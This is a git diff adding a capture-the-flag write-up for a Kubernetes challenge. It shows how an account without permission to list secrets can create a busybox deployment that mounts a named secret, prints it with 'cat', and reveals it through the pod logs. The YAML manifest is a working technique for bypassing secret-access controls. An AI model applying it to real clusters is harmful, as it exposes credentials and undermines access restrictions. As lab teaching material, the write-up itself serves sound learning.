1 files changed, 39 insertions, 0 deletions

diff --git a/punkctf/k8s_03.md b/punkctf/k8s_03.md
new file mode 100644
index 0000000..6f643be
--- /dev/null
+++ b/punkctf/k8s_03.md
@@ -0,0 +1,39 @@
+
+Using `kubectl auth can-i --list`, we see that we can't access secrets anymore, but we can create deployments.
+
+Looking at the existing pod, we see that it mounts a secret called `y0u-cant-l1st-m3-s3crets-n0w`, but it only outputs the hash and we can't exec into it in this challenge.
+
+We can create a deployment similar to the existing pod, but without the hashing:
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: flag-getter
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: flag-getter
+  template:
+    metadata:
+      labels:
+        app: flag-getter
+    spec:
+      containers:
+      - command:
+        - cat
+        - /flag/flag
+        image: busybox
+        imagePullPolicy: IfNotPresent
+        name: flag-getter
+        volumeMounts:
+        - mountPath: /flag
+          name: flag
+      volumes:
+        - name: flag
+          secret:
+            secretName: y0u-cant-l1st-m3-s3crets-n0w
+```
+
+This will die immediately, but that's fine - just read the pod logs and it will have the flag.